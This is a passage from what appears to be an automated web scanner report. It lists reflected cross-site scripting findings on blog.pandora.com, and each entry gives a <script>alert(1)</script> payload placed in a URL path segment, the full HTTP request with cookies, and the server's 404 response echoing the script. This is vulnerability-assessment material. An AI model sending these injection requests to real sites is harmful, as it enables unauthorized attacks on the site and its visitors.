<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dc61<script>alert(1)</script>2a8a18ec9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee470<script>alert(1)</script>1e1c157cf31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9eab0<script>alert(1)</script>503e2b138de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f7d2c<script>alert(1)</script>8f8c0843fd5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fc20<script>alert(1)</script>d72027cb382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e051<script>alert(1)</script>cfbbd073882 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b74cd<script>alert(1)</script>9b829fedb43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4491<script>alert(1)</script>0e7243d947a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f27b<script>alert(1)</script>ff6cdc57baa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b166<script>alert(1)</script>c595edeaf7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d7d6<script>alert(1)</script>9c1bb7f29d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89734<script>alert(1)</script>10ad202e6f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 226ab<script>alert(1)</script>db94c5f4ab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora226ab<script>alert(1)</script>db94c5f4ab5/archives/2007/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f7b27<script>alert(1)</script>e88437a6ff5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf7b27<script>alert(1)</script>e88437a6ff5/2007/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fcf4c<script>alert(1)</script>158d11b266d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007fcf4c<script>alert(1)</script>158d11b266d/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a0649<script>alert(1)</script>9f0447f5c89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/01a0649<script>alert(1)</script>9f0447f5c89/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39608<script>alert(1)</script>520f9e495aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora39608<script>alert(1)</script>520f9e495aa/archives/2007/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94c6d<script>alert(1)</script>71c09bfa91f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives94c6d<script>alert(1)</script>71c09bfa91f/2007/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 133b4<script>alert(1)</script>487daa5efe0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007133b4<script>alert(1)</script>487daa5efe0/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b33a6<script>alert(1)</script>2c3a3b69a5c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/02b33a6<script>alert(1)</script>2c3a3b69a5c/ HTTP/1.1
